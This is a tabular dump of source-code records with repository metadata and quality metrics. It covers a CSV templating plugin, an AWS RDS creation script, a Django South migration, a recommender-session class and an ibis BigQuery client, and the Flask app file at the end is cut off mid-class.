hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
294ddecc4d289926d35a18bd81582fdedcf038ee | 2,999 | py | Python | optional-plugins/CSVPlugin/CSVContext.py | owlfish/pubtal | fb20a0acf2769b2c06012b65bd462f02da12bd1c | [
"BSD-3-Clause"
] | null | null | null | optional-plugins/CSVPlugin/CSVContext.py | owlfish/pubtal | fb20a0acf2769b2c06012b65bd462f02da12bd1c | [
"BSD-3-Clause"
] | null | null | null | optional-plugins/CSVPlugin/CSVContext.py | owlfish/pubtal | fb20a0acf2769b2c06012b65bd462f02da12bd1c | [
"BSD-3-Clause"
] | null | null | null | import ASV
from simpletal import simpleTAL, simpleTALES
try:
import logging
except:
import InfoLogging as logging
import codecs
class ColumnSorter:
def __init__ (self, columnList):
self.columnList = columnList
self.log = logging.getLogger ('ColumnSorter')
def setup (self, fieldNames):
mapList = []
for columnName, translationMap in self.columnList:
try:
colNum = fieldNames.index (columnName)
mapList.append ((colNum, translationMap))
except ValueError, e:
self.log.error ("No such column name as %s" % name)
raise e
self.mapList = mapList
def sort (self, row1, row2):
result = 0
for colNum, map in self.mapList:
result = self.doSort (row1, row2, colNum, map)
if (result != 0):
return result
return result
def doSort (self, row1, row2, colNum, map):
if (map is None):
col1 = row1[colNum]
col2 = row2[colNum]
else:
try:
col1 = map [row1[colNum]]
except KeyError, e:
self.log.warn ("No key found for key %s - assuming low value" % row1[colNum])
return -1
try:
col2 = map [row2[colNum]]
except KeyError, e:
self.log.warn ("No key found for key %s - assuming low value" % row1[colNum])
return 1
if (col1 < col2):
return -1
if (col1 == col2):
return 0
if (col1 > col2):
return 1
class CsvContextCreator:
def __init__ (self, fileName, fileCodec):
self.log = logging.getLogger ("CSVTemplate.CsvContextCreator")
self.csvData = ASV.ASV()
self.csvData.input_from_file(fileName, ASV.CSV(), has_field_names = 1)
self.fieldNames = self.csvData.get_field_names()
self.conv = fileCodec
def getContextMap (self, sorter=None):
orderList = []
for row in self.csvData:
orderList.append (row)
if (sorter is not None):
sorter.setup (self.fieldNames)
try:
orderList.sort (sorter.sort)
except Exception, e:
self.log.error ("Exception occured executing sorter: " + str (e))
raise e
contextList = []
for row in orderList:
rowMap = {}
colCount = 0
for col in row:
if (col != ""):
rowMap[self.fieldNames[colCount]] = self.conv(col)[0]
colCount += 1
contextList.append (rowMap)
return contextList
def getRawData (self):
return unicode (self.csvData)
class CSVTemplateExpander:
def __init__ (self, sourceFile, name="csvList"):
self.contextFactory = CsvContextCreator (sourceFile)
self.name = name
self.template=None
def expandTemplate (self, templateName, outputName, additionalContext = None, sorter=None):
context = simpleTALES.Context()
context.addGlobal (self.name, self.contextFactory.getContextMap (sorter))
if (additionalContext is not None):
context.addGlobal (additionalContext[0], additionalContext[1])
if (self.template is None):
templateFile = open (templateName, 'r')
self.template = simpleTAL.compileHTMLTemplate (templateFile)
templateFile.close()
outputFile = open (outputName, 'w')
self.template.expand (context, outputFile)
outputFile.close()
| 26.307018 | 92 | 0.686896 | 370 | 2,999 | 5.518919 | 0.289189 | 0.020568 | 0.015671 | 0.023506 | 0.123408 | 0.096474 | 0.080313 | 0.080313 | 0.080313 | 0.080313 | 0 | 0.014614 | 0.2014 | 2,999 | 113 | 93 | 26.539823 | 0.837996 | 0 | 0 | 0.177083 | 0 | 0 | 0.066355 | 0.00967 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052083 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2954339ee63d8f3aeb46e217258769ecc01fa43c | 1,444 | py | Python | new_rdsmysql.py | AdminTurnedDevOps/AWS_Solutions_Architect_Python | 5389f8c9dfbda7b0b49a94a93e9b070420ca9ece | [
"MIT"
] | 30 | 2019-01-13T20:14:07.000Z | 2022-02-06T15:08:01.000Z | new_rdsmysql.py | AdminTurnedDevOps/AWS_Solutions_Architect_Python | 5389f8c9dfbda7b0b49a94a93e9b070420ca9ece | [
"MIT"
] | 1 | 2019-01-13T23:52:39.000Z | 2019-01-14T14:39:45.000Z | new_rdsmysql.py | AdminTurnedDevOps/AWS_Solutions_Architect_Python | 5389f8c9dfbda7b0b49a94a93e9b070420ca9ece | [
"MIT"
] | 26 | 2019-01-13T21:32:23.000Z | 2022-03-20T05:19:03.000Z | import boto3
import sys
import time
import logging
import getpass
def new_rdsmysql(dbname, instanceID, storage, dbInstancetype, dbusername):
masterPass = getpass.getpass('DBMasterPassword: ')
if len(masterPass) < 10:
logging.warning('Password is not at least 10 characters. Please try again')
time.sleep(5)
exit
else:
None
try:
rds_instance = boto3.client('rds')
create_instance = rds_instance.create_db_instance(
DBName = dbname,
DBInstanceIdentifier = instanceID,
AllocatedStorage = int(storage),
DBInstanceClass = dbInstancetype,
Engine = 'mysql',
MasterUsername = dbusername,
MasterUserPassword = str(masterPass),
MultiAZ = True,
EngineVersion = '5.7.23',
AutoMinorVersionUpgrade = False,
LicenseModel = 'general-public-license',
PubliclyAccessible = False,
Tags = [
{
'Key': 'Name',
'Value' : dbname
}
]
)
print(create_instance)
except Exception as e:
logging.warning('An error has occured')
print(e)
dbname = sys.argv[1]
instanceID = sys.argv[2]
storage = sys.argv[3]
dbInstancetype = sys.argv[4]
dbusername = sys.argv[5]
new_rdsmysql(dbname, instanceID, storage, dbInstancetype, dbusername) | 27.769231 | 83 | 0.587258 | 134 | 1,444 | 6.268657 | 0.58209 | 0.041667 | 0.040476 | 0.064286 | 0.138095 | 0.138095 | 0.138095 | 0 | 0 | 0 | 0 | 0.01641 | 0.324792 | 1,444 | 52 | 84 | 27.769231 | 0.845128 | 0 | 0 | 0 | 0 | 0 | 0.09827 | 0.015225 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0.111111 | 0.111111 | 0 | 0.133333 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
29560939d9082f0d01fcc95be50270dfe0f453ac | 4,265 | py | Python | tunobase/tagging/migrations/0001_initial.py | unomena/tunobase-core | fd24e378c87407131805fa56ade8669fceec8dfa | [
"BSD-3-Clause"
] | null | null | null | tunobase/tagging/migrations/0001_initial.py | unomena/tunobase-core | fd24e378c87407131805fa56ade8669fceec8dfa | [
"BSD-3-Clause"
] | null | null | null | tunobase/tagging/migrations/0001_initial.py | unomena/tunobase-core | fd24e378c87407131805fa56ade8669fceec8dfa | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Tag'
db.create_table(u'tagging_tag', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=32, db_index=True)),
('description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'], null=True, blank=True)),
))
db.send_create_signal(u'tagging', ['Tag'])
# Adding unique constraint on 'Tag', fields ['title', 'site']
db.create_unique(u'tagging_tag', ['title', 'site_id'])
# Adding model 'ContentObjectTag'
db.create_table(u'tagging_contentobjecttag', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(related_name='content_type_set_for_contentobjecttag', to=orm['contenttypes.ContentType'])),
('object_pk', self.gf('django.db.models.fields.PositiveIntegerField')()),
('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'])),
('tag', self.gf('django.db.models.fields.related.ForeignKey')(related_name='content_object_tags', to=orm['tagging.Tag'])),
))
db.send_create_signal(u'tagging', ['ContentObjectTag'])
def backwards(self, orm):
# Removing unique constraint on 'Tag', fields ['title', 'site']
db.delete_unique(u'tagging_tag', ['title', 'site_id'])
# Deleting model 'Tag'
db.delete_table(u'tagging_tag')
# Deleting model 'ContentObjectTag'
db.delete_table(u'tagging_contentobjecttag')
models = {
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'tagging.contentobjecttag': {
'Meta': {'object_name': 'ContentObjectTag'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_contentobjecttag'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_pk': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_object_tags'", 'to': u"orm['tagging.Tag']"})
},
u'tagging.tag': {
'Meta': {'unique_together': "[('title', 'site')]", 'object_name': 'Tag'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'})
}
}
complete_apps = ['tagging'] | 56.118421 | 182 | 0.597655 | 485 | 4,265 | 5.115464 | 0.164948 | 0.083837 | 0.141072 | 0.201532 | 0.660621 | 0.626763 | 0.566304 | 0.530028 | 0.464329 | 0.410318 | 0 | 0.005795 | 0.190856 | 4,265 | 76 | 183 | 56.118421 | 0.713127 | 0.058382 | 0 | 0.140351 | 0 | 0 | 0.499875 | 0.296333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035088 | false | 0 | 0.070175 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2957082f2761f3302a5b658af0d68aab4daff24f | 1,004 | py | Python | recogym/envs/session.py | philomenec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 413 | 2018-09-18T17:49:44.000Z | 2022-03-23T12:25:41.000Z | recogym/envs/session.py | aliang-rec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 15 | 2018-11-08T17:04:21.000Z | 2021-11-30T19:20:27.000Z | recogym/envs/session.py | aliang-rec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 81 | 2018-09-22T02:28:55.000Z | 2022-03-30T14:03:01.000Z | class Session(list):
"""Abstract Session class"""
def to_strings(self, user_id, session_id):
"""represent session as list of strings (one per event)"""
user_id, session_id = str(user_id), str(session_id)
session_type = self.get_type()
strings = []
for event, product in self:
columns = [user_id, session_type, session_id, event, str(product)]
strings.append(','.join(columns))
return strings
def get_type(self):
raise NotImplemented
class OrganicSessions(Session):
def __init__(self):
super(OrganicSessions, self).__init__()
def next(self, context, product):
self.append(
{
't': context.time(),
'u': context.user(),
'z': 'pageview',
'v': product
}
)
def get_type(self):
return 'organic'
def get_views(self):
return [p for _, _, e, p in self if e == 'pageview']
| 27.135135 | 78 | 0.548805 | 113 | 1,004 | 4.654867 | 0.389381 | 0.045627 | 0.074144 | 0.057034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.330677 | 1,004 | 36 | 79 | 27.888889 | 0.782738 | 0.074701 | 0 | 0.074074 | 0 | 0 | 0.030501 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0.074074 | 0.407407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
295d64816bed48df8774a68b70c332508540215b | 12,525 | py | Python | ibis/bigquery/client.py | tswast/ibis | 2f6d47e4c33cefd7ea1d679bb1d9253c2245993b | [
"Apache-2.0"
] | null | null | null | ibis/bigquery/client.py | tswast/ibis | 2f6d47e4c33cefd7ea1d679bb1d9253c2245993b | [
"Apache-2.0"
] | null | null | null | ibis/bigquery/client.py | tswast/ibis | 2f6d47e4c33cefd7ea1d679bb1d9253c2245993b | [
"Apache-2.0"
] | null | null | null | import regex as re
import time
import collections
import datetime
import six
import pandas as pd
import google.cloud.bigquery as bq
from multipledispatch import Dispatcher
import ibis
import ibis.common as com
import ibis.expr.operations as ops
import ibis.expr.types as ir
import ibis.expr.schema as sch
import ibis.expr.datatypes as dt
import ibis.expr.lineage as lin
from ibis.compat import parse_version
from ibis.client import Database, Query, SQLClient
from ibis.bigquery import compiler as comp
from google.api.core.exceptions import BadRequest
NATIVE_PARTITION_COL = '_PARTITIONTIME'
def _ensure_split(table_id, dataset_id):
split = table_id.split('.')
if len(split) > 1:
assert len(split) == 2
if dataset_id:
raise ValueError(
"Can't pass a fully qualified table name *AND* a dataset_id"
)
(dataset_id, table_id) = split
return (table_id, dataset_id)
_IBIS_TYPE_TO_DTYPE = {
'string': 'STRING',
'int64': 'INT64',
'double': 'FLOAT64',
'boolean': 'BOOL',
'timestamp': 'TIMESTAMP',
'date': 'DATE',
}
_DTYPE_TO_IBIS_TYPE = {
'INT64': dt.int64,
'FLOAT64': dt.double,
'BOOL': dt.boolean,
'STRING': dt.string,
'DATE': dt.date,
# FIXME: enforce no tz info
'DATETIME': dt.timestamp,
'TIME': dt.time,
'TIMESTAMP': dt.timestamp,
'BYTES': dt.binary,
}
_LEGACY_TO_STANDARD = {
'INTEGER': 'INT64',
'FLOAT': 'FLOAT64',
'BOOLEAN': 'BOOL',
}
@dt.dtype.register(bq.schema.SchemaField)
def bigquery_field_to_ibis_dtype(field):
typ = field.field_type
if typ == 'RECORD':
fields = field.fields
assert fields
names = [el.name for el in fields]
ibis_types = list(map(dt.dtype, fields))
ibis_type = dt.Struct(names, ibis_types)
else:
ibis_type = _LEGACY_TO_STANDARD.get(typ, typ)
ibis_type = _DTYPE_TO_IBIS_TYPE.get(ibis_type, ibis_type)
if field.mode == 'REPEATED':
ibis_type = dt.Array(ibis_type)
return ibis_type
@sch.infer.register(bq.table.Table)
def bigquery_schema(table):
pairs = [(el.name, dt.dtype(el)) for el in table.schema]
try:
if table.list_partitions():
pairs.append((NATIVE_PARTITION_COL, dt.timestamp))
except BadRequest:
pass
return sch.schema(pairs)
class BigQueryCursor(object):
"""Cursor to allow the BigQuery client to reuse machinery in ibis/client.py
"""
def __init__(self, query):
self.query = query
def fetchall(self):
return list(self.query.fetch_data())
@property
def columns(self):
return [field.name for field in self.query.schema]
def __enter__(self):
# For compatibility when constructed from Query.execute()
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def _find_scalar_parameter(expr):
""":func:`~ibis.expr.lineage.traverse` function to find all
:class:`~ibis.expr.types.ScalarParameter` instances and yield the operation
and the parent expresssion's resolved name.
Parameters
----------
expr : ibis.expr.types.Expr
Returns
-------
Tuple[bool, object]
"""
op = expr.op()
if isinstance(op, ops.ScalarParameter):
result = op, expr.get_name()
else:
result = None
return lin.proceed, result
class BigQueryQuery(Query):
def __init__(self, client, ddl, query_parameters=None):
super(BigQueryQuery, self).__init__(client, ddl)
# self.expr comes from the parent class
query_parameter_names = dict(
lin.traverse(_find_scalar_parameter, self.expr))
self.query_parameters = [
bigquery_param(
param.to_expr().name(query_parameter_names[param]), value
) for param, value in (query_parameters or {}).items()
]
def _fetch(self, cursor):
df = pd.DataFrame(cursor.fetchall(), columns=cursor.columns)
return self.schema().apply_to(df)
def execute(self):
# synchronous by default
with self.client._execute(
self.compiled_sql,
results=True,
query_parameters=self.query_parameters
) as cur:
result = self._fetch(cur)
return self._wrap_result(result)
class BigQueryAPIProxy(object):
def __init__(self, project_id):
self._client = bq.Client(project_id)
@property
def client(self):
return self._client
@property
def project_id(self):
return self.client.project
def get_datasets(self):
return list(self.client.list_datasets())
def get_dataset(self, dataset_id):
return self.client.dataset(dataset_id)
def get_table(self, table_id, dataset_id, reload=True):
(table_id, dataset_id) = _ensure_split(table_id, dataset_id)
table = self.client.dataset(dataset_id).table(table_id)
if reload:
table.reload()
return table
def get_schema(self, table_id, dataset_id):
return self.get_table(table_id, dataset_id).schema
def run_sync_query(self, stmt):
query = self.client.run_sync_query(stmt)
query.use_legacy_sql = False
query.run()
# run_sync_query is not really synchronous: there's a timeout
while not query.job.done():
query.job.reload()
time.sleep(0.1)
return query
class BigQueryDatabase(Database):
pass
bigquery_param = Dispatcher('bigquery_param')
@bigquery_param.register(ir.StructScalar, collections.OrderedDict)
def bq_param_struct(param, value):
field_params = [bigquery_param(param[k], v) for k, v in value.items()]
return bq.StructQueryParameter(param.get_name(), *field_params)
@bigquery_param.register(ir.ArrayValue, list)
def bq_param_array(param, value):
param_type = param.type()
assert isinstance(param_type, dt.Array), str(param_type)
try:
bigquery_type = _IBIS_TYPE_TO_DTYPE[str(param_type.value_type)]
except KeyError:
raise com.UnsupportedBackendType(param_type)
else:
return bq.ArrayQueryParameter(param.get_name(), bigquery_type, value)
@bigquery_param.register(
ir.TimestampScalar,
six.string_types + (datetime.datetime, datetime.date)
)
def bq_param_timestamp(param, value):
assert isinstance(param.type(), dt.Timestamp)
# TODO(phillipc): Not sure if this is the correct way to do this.
timestamp_value = pd.Timestamp(value, tz='UTC').to_pydatetime()
return bq.ScalarQueryParameter(
param.get_name(), 'TIMESTAMP', timestamp_value)
@bigquery_param.register(ir.StringScalar, six.string_types)
def bq_param_string(param, value):
return bq.ScalarQueryParameter(param.get_name(), 'STRING', value)
@bigquery_param.register(ir.IntegerScalar, six.integer_types)
def bq_param_integer(param, value):
return bq.ScalarQueryParameter(param.get_name(), 'INT64', value)
@bigquery_param.register(ir.FloatingScalar, float)
def bq_param_double(param, value):
return bq.ScalarQueryParameter(param.get_name(), 'FLOAT64', value)
@bigquery_param.register(ir.BooleanScalar, bool)
def bq_param_boolean(param, value):
return bq.ScalarQueryParameter(param.get_name(), 'BOOL', value)
@bigquery_param.register(ir.DateScalar, six.string_types)
def bq_param_date_string(param, value):
return bigquery_param(param, pd.Timestamp(value).to_pydatetime().date())
@bigquery_param.register(ir.DateScalar, datetime.datetime)
def bq_param_date_datetime(param, value):
return bigquery_param(param, value.date())
@bigquery_param.register(ir.DateScalar, datetime.date)
def bq_param_date(param, value):
return bq.ScalarQueryParameter(param.get_name(), 'DATE', value)
class BigQueryClient(SQLClient):
sync_query = BigQueryQuery
database_class = BigQueryDatabase
proxy_class = BigQueryAPIProxy
dialect = comp.BigQueryDialect
def __init__(self, project_id, dataset_id):
self._proxy = type(self).proxy_class(project_id)
self._dataset_id = dataset_id
@property
def project_id(self):
return self._proxy.project_id
@property
def dataset_id(self):
return self._dataset_id
@property
def _table_expr_klass(self):
return ir.TableExpr
def table(self, *args, **kwargs):
t = super(BigQueryClient, self).table(*args, **kwargs)
if NATIVE_PARTITION_COL in t.columns:
col = ibis.options.bigquery.partition_col
assert col not in t
return (t
.mutate(**{col: t[NATIVE_PARTITION_COL]})
.drop([NATIVE_PARTITION_COL]))
return t
def _build_ast(self, expr, context):
result = comp.build_ast(expr, context)
return result
def _execute_query(self, dml, async=False):
klass = self.async_query if async else self.sync_query
inst = klass(self, dml, query_parameters=dml.context.params)
df = inst.execute()
return df
def _fully_qualified_name(self, name, database):
dataset_id = database or self.dataset_id
return dataset_id + '.' + name
def _get_table_schema(self, qualified_name):
return self.get_schema(qualified_name)
def _execute(self, stmt, results=True, query_parameters=None):
# TODO(phillipc): Allow **kwargs in calls to execute
query = self._proxy.client.run_sync_query(stmt)
query.use_legacy_sql = False
query.query_parameters = query_parameters or []
query.run()
# run_sync_query is not really synchronous: there's a timeout
while not query.job.done():
query.job.reload()
time.sleep(0.1)
return BigQueryCursor(query)
def database(self, name=None):
if name is None:
name = self.dataset_id
return self.database_class(name, self)
@property
def current_database(self):
return self.database(self.dataset_id)
def set_database(self, name):
self._dataset_id = name
def exists_database(self, name):
return self._proxy.get_dataset(name).exists()
def list_databases(self, like=None):
results = [dataset.name
for dataset in self._proxy.get_datasets()]
if like:
results = [
dataset_name for dataset_name in results
if re.match(like, dataset_name)
]
return results
def exists_table(self, name, database=None):
(table_id, dataset_id) = _ensure_split(name, database)
return self._proxy.get_table(table_id, dataset_id).exists()
def list_tables(self, like=None, database=None):
dataset = self._proxy.get_dataset(database or self.dataset_id)
result = [table.name for table in dataset.list_tables()]
if like:
result = [
table_name for table_name in result
if re.match(like, table_name)
]
return result
def get_schema(self, name, database=None):
(table_id, dataset_id) = _ensure_split(name, database)
bq_table = self._proxy.get_table(table_id, dataset_id)
return sch.infer(bq_table)
@property
def version(self):
return parse_version(bq.__version__)
_DTYPE_TO_IBIS_TYPE = {
'INT64': dt.int64,
'FLOAT64': dt.double,
'BOOL': dt.boolean,
'STRING': dt.string,
'DATE': dt.date,
# FIXME: enforce no tz info
'DATETIME': dt.timestamp,
'TIME': dt.time,
'TIMESTAMP': dt.timestamp,
'BYTES': dt.binary,
}
_LEGACY_TO_STANDARD = {
'INTEGER': 'INT64',
'FLOAT': 'FLOAT64',
'BOOLEAN': 'BOOL',
}
def _discover_type(field):
typ = field.field_type
if typ == 'RECORD':
fields = field.fields
assert fields
names = [el.name for el in fields]
ibis_types = [_discover_type(el) for el in fields]
ibis_type = dt.Struct(names, ibis_types)
else:
ibis_type = _LEGACY_TO_STANDARD.get(typ, typ)
ibis_type = _DTYPE_TO_IBIS_TYPE.get(ibis_type, ibis_type)
if field.mode == 'REPEATED':
ibis_type = dt.Array(ibis_type)
return ibis_type
def bigquery_table_to_ibis_schema(table):
pairs = [(el.name, _discover_type(el)) for el in table.schema]
try:
if table.list_partitions():
pairs.append((NATIVE_PARTITION_COL, dt.timestamp))
except BadRequest:
pass
return ibis.schema(pairs)
| 28.020134 | 79 | 0.660918 | 1,599 | 12,525 | 4.954972 | 0.161351 | 0.032942 | 0.019437 | 0.022214 | 0.379149 | 0.297615 | 0.261896 | 0.241954 | 0.20207 | 0.20207 | 0 | 0.003755 | 0.234571 | 12,525 | 446 | 80 | 28.08296 | 0.822677 | 0.032176 | 0 | 0.291536 | 0 | 0 | 0.034124 | 0 | 0 | 0 | 0 | 0.004484 | 0.018809 | 0 | null | null | 0.015674 | 0.059561 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
295f637700f993cfd8e37b0ff39f106d2c2a6469 | 1,716 | py | Python | {{cookiecutter.project_slug}}/api/__init__.py | Steamboat/cookiecutter-devops | 6f07329c9e54b76e671a0308d343d2d9ebff5343 | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/api/__init__.py | Steamboat/cookiecutter-devops | 6f07329c9e54b76e671a0308d343d2d9ebff5343 | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/api/__init__.py | Steamboat/cookiecutter-devops | 6f07329c9e54b76e671a0308d343d2d9ebff5343 | [
"BSD-3-Clause"
] | null | null | null |
import logging
from flask import Flask
from flask_sqlalchemy import SQLAlchemy as _BaseSQLAlchemy
from flask_migrate import Migrate
from flask_cors import CORS
from flask_talisman import Talisman
from flask_ipban import IpBan
from config import Config, get_logger_handler
# database
class SQLAlchemy(_BaseSQLAlchemy):
